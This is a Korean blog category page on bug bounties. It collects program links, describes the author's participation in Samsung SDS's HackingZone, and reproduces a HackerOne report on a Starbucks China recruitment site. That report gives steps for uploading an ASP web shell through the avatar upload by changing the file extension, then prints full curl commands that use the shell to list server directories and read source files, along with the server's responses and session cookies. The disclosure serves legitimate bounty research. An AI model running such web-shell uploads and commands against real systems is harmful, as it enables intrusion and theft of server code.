'Bug Bounty'에 해당되는 글 8건

https://hackerone.com/zendesk

https://skymavis.notion.site/Sky-Mavis-Bug-Bounty-Program-ef33b18c4ee14eaab4698a8efd2c9992

https://thezerohack.com/apple-vulnerability-bug-bounty

https://16521092.medium.com/some-ways-to-find-more-idor-da16c93954e5?s=04 

참고

github.com/httpvoid/writeups/blob/main/Apple-RCE.md

사실 해외에 있는 버그바운티를 슬슬 진행하다가 반갑게도 국내에 버그바운티 플랫폼이 오픈을 하여서 핵더 키사 겸 버그바운티를 진행하였습니다.

운이 좋게도 몇 개 취약점이 채택되어서 리워드를 받을 수 있었습니다.

대상 : 해킹존(삼성SDS)

hackingzone.net

작년(11~12월)에 게임의 클로즈베타 느낌처럼 진행을 하였고 2021년 상반기에 오픈 예정이라고 하네요.

그 외

Theori, ENKI, 파스텔플래닛(zerowhale.io) 등의 기업도 버그바운티 플랫폼을 개발하고 있다고 들은거 같네요..

국내에서 더욱더 버그바운티 문화가 활성화 되었으면 좋겠고, 전년도에 있었던

교통안전공단, '제2회 TS 보안 허점을 찾아라!' 공모전 개최

공공기관이든 기업이든 이런 취약점을 찾고 보완하는 기회가 많아지면 좋겠군요.

2021년 부터는 코로나를 조심하면서 국내, 외 기업에서 진행하는 버그바운티에 좀 더 적극적으로 참여할 예정입니다.

alaa0x2.medium.com/how-i-hacked-facebook-part-one-282bbb125a5d

https://hackerone.com/reports/506646

1. Sign in the url(https://ecjobs.starbucks.com.cn) and direct to the resume endpoint.
2. Use burp suite tools to interupt the avatar upload request.
3. Replace the filename type .jpg to aspwhich have a space character behind and modify the content

curl -i -s -k -X $'GET' \ -H $'Host: ecjobs.starbucks.com.cn' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: _ga=GA1.3.779308870.1546486037; ASP.NET_SessionId=w2dbbzgyv3cu0hiiwkysnooo; ASPSESSIONIDSSSBQTQR=FKJDKLGAKJKDALIKOJMJBLAF; ASPSESSIONIDSQRDSRRR=DLNDLPJANKNIAGPMFDEGFLIF' -H $'Upgrade-Insecure-Requests: 1' \ -b $'_ga=GA1.3.779308870.1546486037; ASP.NET_SessionId=w2dbbzgyv3cu0hiiwkysnooo; ASPSESSIONIDSSSBQTQR=FKJDKLGAKJKDALIKOJMJBLAF; ASPSESSIONIDSQRDSRRR=DLNDLPJANKNIAGPMFDEGFLIF' \ $'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=dir%20d:\\TrustHX\\STBKSERM101\\www_app%20%2fd%2fs%2fb'

The response content:

HTTP/1.1 200 OK Date: Fri, 08 Mar 2019 02:56:19 GMT Server: wswaf/2.13.0-5.el6 Content-Type: text/html Cache-Control: private X-Powered-By: ASP.NET X-Via: 1.1 jszjsx51:1 (Cdn Cache Server V2.0), 1.1 PSjxncdx5rt58:6 (Cdn Cache Server V2.0) Connection: close Content-Length: 1814533 <html> <body> <h1>POC by hackerone_john stone</h1> <textarea readonly cols=80 rows=25> d:\TrustHX\STBKSERM101\www_app\bin d:\TrustHX\STBKSERM101\www_app\common d:\TrustHX\STBKSERM101\www_app\concurrent_test d:\TrustHX\STBKSERM101\www_app\Default.aspx d:\TrustHX\STBKSERM101\www_app\Global.asax d:\TrustHX\STBKSERM101\www_app\hximages_v6 .................................... </textarea> </body> </html>

Show the internal source code

curl -i -s -k -X $'GET' \ -H $'Host: ecjobs.starbucks.com.cn' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: _ga=GA1.3.779308870.1546486037; ASP.NET_SessionId=w2dbbzgyv3cu0hiiwkysnooo; ASPSESSIONIDSSSBQTQR=FKJDKLGAKJKDALIKOJMJBLAF; ASPSESSIONIDSQRDSRRR=DLNDLPJANKNIAGPMFDEGFLIF' -H $'Upgrade-Insecure-Requests: 1' \ -b $'_ga=GA1.3.779308870.1546486037; ASP.NET_SessionId=w2dbbzgyv3cu0hiiwkysnooo; ASPSESSIONIDSSSBQTQR=FKJDKLGAKJKDALIKOJMJBLAF; ASPSESSIONIDSQRDSRRR=DLNDLPJANKNIAGPMFDEGFLIF' \ $'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=type%20d:\\TrustHX\\STBKSERM101\\www_app\\concurrent_test\\new_application_concurrent_test__svc.cs'